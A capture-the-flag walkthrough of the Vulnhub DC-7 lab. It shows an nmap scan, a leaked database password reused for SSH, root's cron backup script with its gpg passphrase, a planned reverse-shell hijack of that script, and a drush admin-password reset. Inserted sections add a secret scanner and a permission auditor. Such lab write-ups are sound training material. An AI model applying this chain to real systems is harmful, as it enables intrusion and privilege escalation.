Heaven rewards the diligent

[Vulnhub] — DC-7

1. Port scanning

Since this VM shows its IP address on the console when it boots, we can go straight to scanning its ports.

Using nmap:

root@kali:~# nmap -sV -A 192.168.203.133 --script=vuln
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-15 22:50 CST
Pre-scan script results:
| broadcast-avahi-dos: 
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).
Nmap scan report for 192.168.203.133
Host is up (0.00083s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
80/tcp open  http    Apache httpd 2.4.25 ((Debian))
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
| http-csrf: 
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.203.133
|   Found the following possible CSRF vulnerabilities: 
|     
|     Path: http://192.168.203.133:80/
|     Form id: search-block-form
|     Form action: /search/node
|     
|     Path: http://192.168.203.133:80/search/node
|     Form id: search-form
|     Form action: /search/node
|     
|     Path: http://192.168.203.133:80/search/node
|     Form id: search-block-form
|     Form action: /search/node
|     
|     Path: http://192.168.203.133:80/node/1
|     Form id: search-block-form
|     Form action: /search/node
|     
|     Path: http://192.168.203.133:80/user/login
|     Form id: user-login-form
|     Form action: /user/login
|     
|     Path: http://192.168.203.133:80/user/login
|     Form id: search-block-form
|     Form action: /search/node
|     
|     Path: http://192.168.203.133:80/search/node
|     Form id: search-form
|     Form action: /search/node
|     
|     Path: http://192.168.203.133:80/search/node
|     Form id: search-block-form
|     Form action: /search/node
|     
|     Path: http://192.168.203.133:80/search/node/help
|     Form id: search-block-form
|     Form action: /search/node
|     
|     Path: http://192.168.203.133:80/search/node
|     Form id: search-form
|     Form action: /search/node
|     
|     Path: http://192.168.203.133:80/search/node
|     Form id: search-block-form
|     Form action: /search/node
|     
|     Path: http://192.168.203.133:80/node/
|     Form id: search-block-form
|     Form action: /search/node
|     
|     Path: http://192.168.203.133:80/user/login
|     Form id: user-login-form
|     Form action: /user/login
|     
|     Path: http://192.168.203.133:80/user/login
|     Form id: search-block-form
|     Form action: /search/node
|     
|     Path: http://192.168.203.133:80/user/password
|     Form id: user-pass
|     Form action: /user/password
|     
|     Path: http://192.168.203.133:80/user/password
|     Form id: search-block-form
|     Form action: /search/node
|     
|     Path: http://192.168.203.133:80/search/node/
|     Form id: search-form
|     Form action: /search/node/
|     
|     Path: http://192.168.203.133:80/search/node/
|     Form id: search-block-form
|_    Form action: /search/node
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum: 
|   /rss.xml: RSS or Atom feed
|   /robots.txt: Robots file
|   /INSTALL.txt: Drupal file
|   /: Drupal version 8 
|_  /README.txt: Interesting, a readme.
|_http-server-header: Apache/2.4.25 (Debian)
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| vulners: 
|   cpe:/a:apache:http_server:2.4.25: 
|     	CVE-2017-7679	7.5	https://vulners.com/cve/CVE-2017-7679
|     	CVE-2017-7668	7.5	https://vulners.com/cve/CVE-2017-7668
|     	CVE-2017-3169	7.5	https://vulners.com/cve/CVE-2017-3169
|     	CVE-2017-3167	7.5	https://vulners.com/cve/CVE-2017-3167
|     	CVE-2019-0211	7.2	https://vulners.com/cve/CVE-2019-0211
|     	CVE-2018-1312	6.8	https://vulners.com/cve/CVE-2018-1312
|     	CVE-2017-15715	6.8	https://vulners.com/cve/CVE-2017-15715
|     	CVE-2019-10082	6.4	https://vulners.com/cve/CVE-2019-10082
|     	CVE-2017-9788	6.4	https://vulners.com/cve/CVE-2017-9788
|     	CVE-2019-0217	6.0	https://vulners.com/cve/CVE-2019-0217
|     	CVE-2019-10098	5.8	https://vulners.com/cve/CVE-2019-10098
|     	CVE-2019-10081	5.0	https://vulners.com/cve/CVE-2019-10081
|     	CVE-2019-0220	5.0	https://vulners.com/cve/CVE-2019-0220
|     	CVE-2019-0196	5.0	https://vulners.com/cve/CVE-2019-0196
|     	CVE-2018-17199	5.0	https://vulners.com/cve/CVE-2018-17199
|     	CVE-2018-1333	5.0	https://vulners.com/cve/CVE-2018-1333
|     	CVE-2017-9798	5.0	https://vulners.com/cve/CVE-2017-9798
|     	CVE-2017-7659	5.0	https://vulners.com/cve/CVE-2017-7659
|     	CVE-2017-15710	5.0	https://vulners.com/cve/CVE-2017-15710
|     	CVE-2019-0197	4.9	https://vulners.com/cve/CVE-2019-0197
|     	CVE-2019-10092	4.3	https://vulners.com/cve/CVE-2019-10092
|     	CVE-2018-11763	4.3	https://vulners.com/cve/CVE-2018-11763
|_    	CVE-2018-1283	3.5	https://vulners.com/cve/CVE-2018-1283
MAC Address: 00:0C:29:B2:DE:22 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.83 ms 192.168.203.133

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 118.99 seconds

The host has ports 22 and 80 open; the web service on port 80 is the Drupal CMS, version 8.

2. Looking for vulnerabilities

Using searchsploit:

Started msf and tried the exploits... all of them failed.

Looks like we need a different way in.

3. Information gathering

Visit the target's website.

It gives the following hint:

Welcome to DC-7
DC-7 introduces some "new" concepts, but I'll leave you to figure out what they are.  :-)
While this challenge isn't all that technical, if you need to resort to brute forcing or a dictionary attacks, you probably won't succeed.
What you will have to do, is to think "outside" the box.
Way "outside" the box.  :-)

"Thinking outside the box" is telling us to search the Internet for usable information, but where should we start?

In the bottom-left corner of the CMS site there is a distinctive string, @DC7USER; let's search for it on Google.

Source code leaked on GitHub??

It looks like it. Let's check the configuration file config.php:

<?php
	$servername = "localhost";
	$username = "dc7user";
	$password = "MdR3xOgB7#dW";
	$dbname = "Staff";
	$conn = mysqli_connect($servername, $username, $password, $dbname);
?>

We now have the database account and password; first let's see whether they also work for SSH.

I mistyped the password the first time... now the SSH login has succeeded.
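The foothold above exists only because a configuration file with a literal password was committed to a public repository and the same password was reused for SSH. As an added example (not code from the original post or from the DC-7 project), the Python scanner below flags quoted literals assigned to secret-looking names in PHP-style and `define()`-style configuration files, so such a file can be caught before it is committed. The two file bodies it scans are constructed here, with a placeholder instead of the real password; the name list, regexes and `mask()` helper are my own choices and not anything the page describes.

```python
import re
import sys

# Constructed sample in the shape of the leaked config.php above; the
# password value is a placeholder, not the one from the challenge.
SAMPLE_LEAKY_CONFIG = """<?php
    $servername = "localhost";
    $username = "dc7user";
    $password = "PLACEHOLDER_NOT_REAL";
    $dbname = "Staff";
    $conn = mysqli_connect($servername, $username, $password, $dbname);
?>
"""

# Constructed "fixed" version: the secret comes from the environment, so
# nothing sensitive is stored in the repository.
SAMPLE_SAFE_CONFIG = """<?php
    $servername = "localhost";
    $username = getenv("DB_USER");
    $password = getenv("DB_PASSWORD");
    define('DB_NAME', 'Staff');
?>
"""

# Variable/constant names that usually hold a secret.
SECRET_NAME = re.compile(
    r"pass(word|wd|phrase)?|pwd|secret|token|api_?key|private_?key",
    re.IGNORECASE)

# $name = "literal";   or   name = 'literal'   (PHP variables, ini-style keys)
ASSIGNMENT = re.compile(
    r"^\s*\$?(?P<name>[A-Za-z_][A-Za-z0-9_]*)\s*=\s*"
    r"(?P<q>[\"'])(?P<value>.*?)(?P=q)\s*;?\s*$")

# define('NAME', 'literal');
DEFINE = re.compile(
    r"define\(\s*(?P<q1>[\"'])(?P<name>\w+)(?P=q1)\s*,\s*"
    r"(?P<q2>[\"'])(?P<value>.*?)(?P=q2)\s*\)")


def mask(value):
    """Show just enough of a value to recognise it in a report."""
    return value[:2] + "***"


def find_hardcoded_secrets(text):
    """Return (line_number, name, masked_value) for every quoted literal
    assigned to a secret-looking name. Values produced by a call such as
    getenv() are not literals and are not reported."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for pattern in (ASSIGNMENT, DEFINE):
            m = pattern.search(line)
            if m and m.group("value") and SECRET_NAME.search(m.group("name")):
                findings.append((lineno, m.group("name"), mask(m.group("value"))))
                break
    return findings


def scan_files(paths):
    """Scan the files named on the command line; returns the finding count."""
    total = 0
    for path in paths:
        with open(path, encoding="utf-8", errors="replace") as fh:
            for lineno, name, value in find_hardcoded_secrets(fh.read()):
                print(f"{path}:{lineno}: literal secret in {name} = {value}")
                total += 1
    return total


if __name__ == "__main__":
    # Non-zero exit makes this usable as a git pre-commit hook.
    sys.exit(1 if scan_files(sys.argv[1:]) else 0)
```

Run as `python scan.py config.php settings.php`; a non-zero exit status blocks the commit when the script is wired into a pre-commit hook. The masked output is deliberate: a report that prints the secret in full just creates a second place where it leaks.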

4. Privilege escalation

Run the command sudo -l.

It tells us we have new mail. (Added later: "You have new mail in /var/mail/dc7user" is actually the output of the cron job.)

Read the mail:

dc7user@dc-7:~$ cat /var/mail/dc7user
From root@dc-7 Sun Feb 16 00:15:21 2020
Return-path: <root@dc-7>
Envelope-to: root@dc-7
Delivery-date: Sun, 16 Feb 2020 00:15:21 +1000
Received: from root by dc-7 with local (Exim 4.89)
	(envelope-from <root@dc-7>)
	id 1j2yE5-0000Gr-8J
	for root@dc-7; Sun, 16 Feb 2020 00:15:21 +1000
From: root@dc-7 (Cron Daemon)
To: root@dc-7
Subject: Cron <root@dc-7> /opt/scripts/backups.sh
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-Cron-Env: <PATH=/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin>
X-Cron-Env: <SHELL=/bin/sh>
X-Cron-Env: <HOME=/root>
X-Cron-Env: <LOGNAME=root>
Message-Id: <E1j2yE5-0000Gr-8J@dc-7>
Date: Sun, 16 Feb 2020 00:15:21 +1000

rm: cannot remove '/home/dc7user/backups/*': No such file or directory
Database dump saved to /home/dc7user/backups/website.sql               [success]

From root@dc-7 Sun Feb 16 00:30:05 2020
Return-path: <root@dc-7>
Envelope-to: root@dc-7
Delivery-date: Sun, 16 Feb 2020 00:30:05 +1000
Received: from root by dc-7 with local (Exim 4.89)
	(envelope-from <root@dc-7>)
	id 1j2ySL-0000HV-Ld
	for root@dc-7; Sun, 16 Feb 2020 00:30:05 +1000
From: root@dc-7 (Cron Daemon)
To: root@dc-7
Subject: Cron <root@dc-7> /opt/scripts/backups.sh
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-Cron-Env: <PATH=/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin>
X-Cron-Env: <SHELL=/bin/sh>
X-Cron-Env: <HOME=/root>
X-Cron-Env: <LOGNAME=root>
Message-Id: <E1j2ySL-0000HV-Ld@dc-7>
Date: Sun, 16 Feb 2020 00:30:05 +1000

Database dump saved to /home/dc7user/backups/website.sql               [success]

From root@dc-7 Sun Feb 16 00:45:06 2020
Return-path: <root@dc-7>
Envelope-to: root@dc-7
Delivery-date: Sun, 16 Feb 2020 00:45:06 +1000
Received: from root by dc-7 with local (Exim 4.89)
	(envelope-from <root@dc-7>)
	id 1j2ygr-0000I6-Te
	for root@dc-7; Sun, 16 Feb 2020 00:45:05 +1000
From: root@dc-7 (Cron Daemon)
To: root@dc-7
Subject: Cron <root@dc-7> /opt/scripts/backups.sh
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-Cron-Env: <PATH=/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin>
X-Cron-Env: <SHELL=/bin/sh>
X-Cron-Env: <HOME=/root>
X-Cron-Env: <LOGNAME=root>
Message-Id: <E1j2ygr-0000I6-Te@dc-7>
Date: Sun, 16 Feb 2020 00:45:05 +1000

Database dump saved to /home/dc7user/backups/website.sql               [success]

From root@dc-7 Sun Feb 16 01:00:09 2020
Return-path: <root@dc-7>
Envelope-to: root@dc-7
Delivery-date: Sun, 16 Feb 2020 01:00:09 +1000
Received: from root by dc-7 with local (Exim 4.89)
	(envelope-from <root@dc-7>)
	id 1j2yvQ-0000JV-NC
	for root@dc-7; Sun, 16 Feb 2020 01:00:08 +1000
From: root@dc-7 (Cron Daemon)
To: root@dc-7
Subject: Cron <root@dc-7> /opt/scripts/backups.sh
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-Cron-Env: <PATH=/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin>
X-Cron-Env: <SHELL=/bin/sh>
X-Cron-Env: <HOME=/root>
X-Cron-Env: <LOGNAME=root>
Message-Id: <E1j2yvQ-0000JV-NC@dc-7>
Date: Sun, 16 Feb 2020 01:00:08 +1000

Database dump saved to /home/dc7user/backups/website.sql               [success]

From root@dc-7 Sun Feb 16 01:15:07 2020
Return-path: <root@dc-7>
Envelope-to: root@dc-7
Delivery-date: Sun, 16 Feb 2020 01:15:07 +1000
Received: from root by dc-7 with local (Exim 4.89)
	(envelope-from <root@dc-7>)
	id 1j2z9v-0000K6-6H
	for root@dc-7; Sun, 16 Feb 2020 01:15:07 +1000
From: root@dc-7 (Cron Daemon)
To: root@dc-7
Subject: Cron <root@dc-7> /opt/scripts/backups.sh
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-Cron-Env: <PATH=/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin>
X-Cron-Env: <SHELL=/bin/sh>
X-Cron-Env: <HOME=/root>
X-Cron-Env: <LOGNAME=root>
Message-Id: <E1j2z9v-0000K6-6H@dc-7>
Date: Sun, 16 Feb 2020 01:15:07 +1000

Database dump saved to /home/dc7user/backups/website.sql               [success]

From root@dc-7 Sun Feb 16 01:30:07 2020
Return-path: <root@dc-7>
Envelope-to: root@dc-7
Delivery-date: Sun, 16 Feb 2020 01:30:07 +1000
Received: from root by dc-7 with local (Exim 4.89)
	(envelope-from <root@dc-7>)
	id 1j2zOR-0000Kh-1J
	for root@dc-7; Sun, 16 Feb 2020 01:30:07 +1000
From: root@dc-7 (Cron Daemon)
To: root@dc-7
Subject: Cron <root@dc-7> /opt/scripts/backups.sh
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-Cron-Env: <PATH=/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin>
X-Cron-Env: <SHELL=/bin/sh>
X-Cron-Env: <HOME=/root>
X-Cron-Env: <LOGNAME=root>
Message-Id: <E1j2zOR-0000Kh-1J@dc-7>
Date: Sun, 16 Feb 2020 01:30:07 +1000

Database dump saved to /home/dc7user/backups/website.sql               [success]

From root@dc-7 Sun Feb 16 11:00:07 2020
Return-path: <root@dc-7>
Envelope-to: root@dc-7
Delivery-date: Sun, 16 Feb 2020 11:00:07 +1000
Received: from root by dc-7 with local (Exim 4.89)
	(envelope-from <root@dc-7>)
	id 1j38I3-0000MX-Rc
	for root@dc-7; Sun, 16 Feb 2020 11:00:07 +1000
From: root@dc-7 (Cron Daemon)
To: root@dc-7
Subject: Cron <root@dc-7> /opt/scripts/backups.sh
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-Cron-Env: <PATH=/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin>
X-Cron-Env: <SHELL=/bin/sh>
X-Cron-Env: <HOME=/root>
X-Cron-Env: <LOGNAME=root>
Message-Id: <E1j38I3-0000MX-Rc@dc-7>
Date: Sun, 16 Feb 2020 11:00:07 +1000

Database dump saved to /home/dc7user/backups/website.sql               [success]

From the mail content, this looks like a backup script that root runs on a schedule. It mentions the directory /home/dc7user, so let's look there:

And there we find another mailbox:

dc7user@dc-7:/home$ cd dc7user/
dc7user@dc-7:~$ ls
backups  mbox
dc7user@dc-7:~$ cd mbox
-bash: cd: mbox: Not a directory
dc7user@dc-7:~$ cat mbox

From root@dc-7 Thu Aug 29 17:00:22 2019
Return-path: <root@dc-7>
Envelope-to: root@dc-7
Delivery-date: Thu, 29 Aug 2019 17:00:22 +1000
Received: from root by dc-7 with local (Exim 4.89)
	(envelope-from <root@dc-7>)
	id 1i3EPu-0000CV-5C
	for root@dc-7; Thu, 29 Aug 2019 17:00:22 +1000
From: root@dc-7 (Cron Daemon)
To: root@dc-7
Subject: Cron <root@dc-7> /opt/scripts/backups.sh
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-Cron-Env: <PATH=/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin>
X-Cron-Env: <SHELL=/bin/sh>
X-Cron-Env: <HOME=/root>
X-Cron-Env: <LOGNAME=root>
Message-Id: <E1i3EPu-0000CV-5C@dc-7>
Date: Thu, 29 Aug 2019 17:00:22 +1000

Database dump saved to /home/dc7user/backups/website.sql               [success]
gpg: symmetric encryption of '/home/dc7user/backups/website.tar.gz' failed: File exists
gpg: symmetric encryption of '/home/dc7user/backups/website.sql' failed: File exists

From root@dc-7 Thu Aug 29 17:15:11 2019
Return-path: <root@dc-7>
Envelope-to: root@dc-7
Delivery-date: Thu, 29 Aug 2019 17:15:11 +1000
Received: from root by dc-7 with local (Exim 4.89)
	(envelope-from <root@dc-7>)
	id 1i3EeF-0000Dx-G1
	for root@dc-7; Thu, 29 Aug 2019 17:15:11 +1000
From: root@dc-7 (Cron Daemon)
To: root@dc-7
Subject: Cron <root@dc-7> /opt/scripts/backups.sh
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-Cron-Env: <PATH=/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin>
X-Cron-Env: <SHELL=/bin/sh>
X-Cron-Env: <HOME=/root>
X-Cron-Env: <LOGNAME=root>
Message-Id: <E1i3EeF-0000Dx-G1@dc-7>
Date: Thu, 29 Aug 2019 17:15:11 +1000

Database dump saved to /home/dc7user/backups/website.sql               [success]
gpg: symmetric encryption of '/home/dc7user/backups/website.tar.gz' failed: File exists
gpg: symmetric encryption of '/home/dc7user/backups/website.sql' failed: File exists

From root@dc-7 Thu Aug 29 17:30:11 2019
Return-path: <root@dc-7>
Envelope-to: root@dc-7
Delivery-date: Thu, 29 Aug 2019 17:30:11 +1000
Received: from root by dc-7 with local (Exim 4.89)
	(envelope-from <root@dc-7>)
	id 1i3Esl-0000Ec-JQ
	for root@dc-7; Thu, 29 Aug 2019 17:30:11 +1000
From: root@dc-7 (Cron Daemon)
To: root@dc-7
Subject: Cron <root@dc-7> /opt/scripts/backups.sh
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-Cron-Env: <PATH=/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin>
X-Cron-Env: <SHELL=/bin/sh>
X-Cron-Env: <HOME=/root>
X-Cron-Env: <LOGNAME=root>
Message-Id: <E1i3Esl-0000Ec-JQ@dc-7>
Date: Thu, 29 Aug 2019 17:30:11 +1000

Database dump saved to /home/dc7user/backups/website.sql               [success]
gpg: symmetric encryption of '/home/dc7user/backups/website.tar.gz' failed: File exists
gpg: symmetric encryption of '/home/dc7user/backups/website.sql' failed: File exists

From root@dc-7 Thu Aug 29 17:45:11 2019
Return-path: <root@dc-7>
Envelope-to: root@dc-7
Delivery-date: Thu, 29 Aug 2019 17:45:11 +1000
Received: from root by dc-7 with local (Exim 4.89)
	(envelope-from <root@dc-7>)
	id 1i3F7H-0000G3-Nb
	for root@dc-7; Thu, 29 Aug 2019 17:45:11 +1000
From: root@dc-7 (Cron Daemon)
To: root@dc-7
Subject: Cron <root@dc-7> /opt/scripts/backups.sh
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-Cron-Env: <PATH=/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin>
X-Cron-Env: <SHELL=/bin/sh>
X-Cron-Env: <HOME=/root>
X-Cron-Env: <LOGNAME=root>
Message-Id: <E1i3F7H-0000G3-Nb@dc-7>
Date: Thu, 29 Aug 2019 17:45:11 +1000

Database dump saved to /home/dc7user/backups/website.sql               [success]
gpg: symmetric encryption of '/home/dc7user/backups/website.tar.gz' failed: File exists
gpg: symmetric encryption of '/home/dc7user/backups/website.sql' failed: File exists

From root@dc-7 Thu Aug 29 20:45:21 2019
Return-path: <root@dc-7>
Envelope-to: root@dc-7
Delivery-date: Thu, 29 Aug 2019 20:45:21 +1000
Received: from root by dc-7 with local (Exim 4.89)
	(envelope-from <root@dc-7>)
	id 1i3Hvd-0000ED-CP
	for root@dc-7; Thu, 29 Aug 2019 20:45:21 +1000
From: root@dc-7 (Cron Daemon)
To: root@dc-7
Subject: Cron <root@dc-7> /opt/scripts/backups.sh
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-Cron-Env: <PATH=/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin>
X-Cron-Env: <SHELL=/bin/sh>
X-Cron-Env: <HOME=/root>
X-Cron-Env: <LOGNAME=root>
Message-Id: <E1i3Hvd-0000ED-CP@dc-7>
Date: Thu, 29 Aug 2019 20:45:21 +1000

Database dump saved to /home/dc7user/backups/website.sql               [success]
gpg: symmetric encryption of '/home/dc7user/backups/website.tar.gz' failed: File exists
gpg: symmetric encryption of '/home/dc7user/backups/website.sql' failed: File exists

From root@dc-7 Thu Aug 29 22:45:17 2019
Return-path: <root@dc-7>
Envelope-to: root@dc-7
Delivery-date: Thu, 29 Aug 2019 22:45:17 +1000
Received: from root by dc-7 with local (Exim 4.89)
	(envelope-from <root@dc-7>)
	id 1i3Jng-0000Iw-Rq
	for root@dc-7; Thu, 29 Aug 2019 22:45:16 +1000
From: root@dc-7 (Cron Daemon)
To: root@dc-7
Subject: Cron <root@dc-7> /opt/scripts/backups.sh
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-Cron-Env: <PATH=/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin>
X-Cron-Env: <SHELL=/bin/sh>
X-Cron-Env: <HOME=/root>
X-Cron-Env: <LOGNAME=root>
Message-Id: <E1i3Jng-0000Iw-Rq@dc-7>
Date: Thu, 29 Aug 2019 22:45:16 +1000

Database dump saved to /home/dc7user/backups/website.sql               [success]

From root@dc-7 Thu Aug 29 23:00:12 2019
Return-path: <root@dc-7>
Envelope-to: root@dc-7
Delivery-date: Thu, 29 Aug 2019 23:00:12 +1000
Received: from root by dc-7 with local (Exim 4.89)
	(envelope-from <root@dc-7>)
	id 1i3K28-0000Ll-11
	for root@dc-7; Thu, 29 Aug 2019 23:00:12 +1000
From: root@dc-7 (Cron Daemon)
To: root@dc-7
Subject: Cron <root@dc-7> /opt/scripts/backups.sh
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-Cron-Env: <PATH=/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin>
X-Cron-Env: <SHELL=/bin/sh>
X-Cron-Env: <HOME=/root>
X-Cron-Env: <LOGNAME=root>
Message-Id: <E1i3K28-0000Ll-11@dc-7>
Date: Thu, 29 Aug 2019 23:00:12 +1000

Database dump saved to /home/dc7user/backups/website.sql               [success]

From root@dc-7 Fri Aug 30 00:15:18 2019
Return-path: <root@dc-7>
Envelope-to: root@dc-7
Delivery-date: Fri, 30 Aug 2019 00:15:18 +1000
Received: from root by dc-7 with local (Exim 4.89)
	(envelope-from <root@dc-7>)
	id 1i3LCo-0000Eb-02
	for root@dc-7; Fri, 30 Aug 2019 00:15:18 +1000
From: root@dc-7 (Cron Daemon)
To: root@dc-7
Subject: Cron <root@dc-7> /opt/scripts/backups.sh
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-Cron-Env: <PATH=/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin>
X-Cron-Env: <SHELL=/bin/sh>
X-Cron-Env: <HOME=/root>
X-Cron-Env: <LOGNAME=root>
Message-Id: <E1i3LCo-0000Eb-02@dc-7>
Date: Fri, 30 Aug 2019 00:15:18 +1000

rm: cannot remove '/home/dc7user/backups/*': No such file or directory
Database dump saved to /home/dc7user/backups/website.sql               [success]

From root@dc-7 Fri Aug 30 03:15:17 2019
Return-path: <root@dc-7>
Envelope-to: root@dc-7
Delivery-date: Fri, 30 Aug 2019 03:15:17 +1000
Received: from root by dc-7 with local (Exim 4.89)
	(envelope-from <root@dc-7>)
	id 1i3O0y-0000Ed-To
	for root@dc-7; Fri, 30 Aug 2019 03:15:17 +1000
From: root@dc-7 (Cron Daemon)
To: root@dc-7
Subject: Cron <root@dc-7> /opt/scripts/backups.sh
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
X-Cron-Env: <PATH=/bin:/usr/bin:/usr/local/bin:/sbin:/usr/sbin>
X-Cron-Env: <SHELL=/bin/sh>
X-Cron-Env: <HOME=/root>
X-Cron-Env: <LOGNAME=root>
Message-Id: <E1i3O0y-0000Ed-To@dc-7>
Date: Fri, 30 Aug 2019 03:15:17 +1000

rm: cannot remove '/home/dc7user/backups/*': No such file or directory
Database dump saved to /home/dc7user/backups/website.sql               [success]

Then let's look in the backups directory:

dc7user@dc-7:~/backups$ ls
website.sql.gpg  website.tar.gz.gpg

Two gpg files; let's cat them:

They are nothing but binary garbage, so I searched online for the gpg file format. In short:

Source link: http://www.ruanyifeng.com/blog/2013/07/gpg.html

To read the contents we first have to decrypt them, and decryption needs the key.

Following this thread, let's look at the script that does the backup, /opt/scripts/backups.sh:

dc7user@dc-7:~/backups$ cat /opt/scripts/backups.sh
#!/bin/bash
rm /home/dc7user/backups/*
cd /var/www/html/
drush sql-dump --result-file=/home/dc7user/backups/website.sql
cd ..
tar -czf /home/dc7user/backups/website.tar.gz html/
gpg --pinentry-mode loopback --passphrase PickYourOwnPassword --symmetric /home/dc7user/backups/website.sql
gpg --pinentry-mode loopback --passphrase PickYourOwnPassword --symmetric /home/dc7user/backups/website.tar.gz
chown dc7user:dc7user /home/dc7user/backups/*
rm /home/dc7user/backups/website.sql
rm /home/dc7user/backups/website.tar.gz
You have new mail in /var/mail/dc7user

Analysis: what gets backed up is the site's database and files, which means we don't need to decrypt the gpg archives at all; we can look at those files directly under the web root. Second, since this script runs as root, writing our reverse-shell command into it would give us a root shell.

First let's check the script's permissions:

dc7user@dc-7:~/backups$ ls -l /opt/scripts/backups.sh
-rwxrwxr-x 1 root www-data 520 Aug 29 23:02 /opt/scripts/backups.sh

And check who we are:

dc7user@dc-7:~/backups$ whoami
dc7user

Clearly, as dc7user we can't write the reverse-shell command into backups.sh. So we need to find a way to become www-data, and that user has to be approached from the web side.
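The listing above is the root cause of the whole privilege escalation: a script that root runs from cron is group-writable by www-data, so whoever controls the web server controls what root executes. As an added example (not code from the original post), the Python below audits such a script: it flags non-root ownership and any group or world write bit, either from an `ls -l` line or by stat-ing a path. The `ls -l` line it checks is the one from the listing above; the temporary file created in `demo()` is constructed to carry the same 775 mode.

```python
import os
import pwd
import stat
import tempfile

# The listing from the walkthrough: owner root, group www-data, mode 775.
LS_LINE = "-rwxrwxr-x 1 root www-data 520 Aug 29 23:02 /opt/scripts/backups.sh"

# Symbolic-mode positions in 'ls -l' order: user rwx, group rwx, other rwx.
PERM_BITS = (stat.S_IRUSR, stat.S_IWUSR, stat.S_IXUSR,
             stat.S_IRGRP, stat.S_IWGRP, stat.S_IXGRP,
             stat.S_IROTH, stat.S_IWOTH, stat.S_IXOTH)


def mode_problems(mode, owner):
    """Reasons a script executed from root's crontab is unsafe with this
    permission mode (int) and owner (user name). Empty list = acceptable."""
    problems = []
    if owner != "root":
        problems.append("not owned by root")
    if mode & stat.S_IWGRP:
        problems.append("group-writable")
    if mode & stat.S_IWOTH:
        problems.append("world-writable")
    return problems


def parse_ls_line(line):
    """Turn one 'ls -l' line into (mode, owner). 's'/'t' in an execute
    position mean special bit plus execute; 'S'/'T' mean special bit only."""
    fields = line.split(None, 8)
    sym, owner = fields[0], fields[2]
    mode = 0
    for pos, (ch, bit) in enumerate(zip(sym[1:10], PERM_BITS)):
        if ch in "rwxst":
            mode |= bit
        if pos == 2 and ch in "sS":
            mode |= stat.S_ISUID
        elif pos == 5 and ch in "sS":
            mode |= stat.S_ISGID
        elif pos == 8 and ch in "tT":
            mode |= stat.S_ISVTX
    return mode, owner


def audit_ls_line(line):
    return mode_problems(*parse_ls_line(line))


def audit_path(path):
    """Same check against the live filesystem."""
    st = os.stat(path)
    owner = pwd.getpwuid(st.st_uid).pw_name
    return mode_problems(stat.S_IMODE(st.st_mode), owner)


def demo():
    # Constructed: a temporary file with the same 775 mode as backups.sh.
    # Its owner is whoever runs this, so it is also flagged unless run as root.
    fd, path = tempfile.mkstemp()
    os.close(fd)
    try:
        os.chmod(path, 0o775)
        return audit_path(path)
    finally:
        os.unlink(path)


if __name__ == "__main__":
    print(LS_LINE, "->", audit_ls_line(LS_LINE))
    print("temp file with mode 775 ->", demo())
```

The fix on the box would be `chmod 755 /opt/scripts/backups.sh` (and keeping the group as root): a program that root executes must not be writable by any account that root does not fully trust, and the web server account is the least trustworthy one on a host that serves a CMS.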

We also saw another command in the script, drush, so I looked it up on Baidu.

Drush is a third-party module dedicated to Drupal.

In other words, it is a shell for administering Drupal, and we can use it to change the admin password.

dc7user@dc-7:~$ drush user-password admin --password="admin"
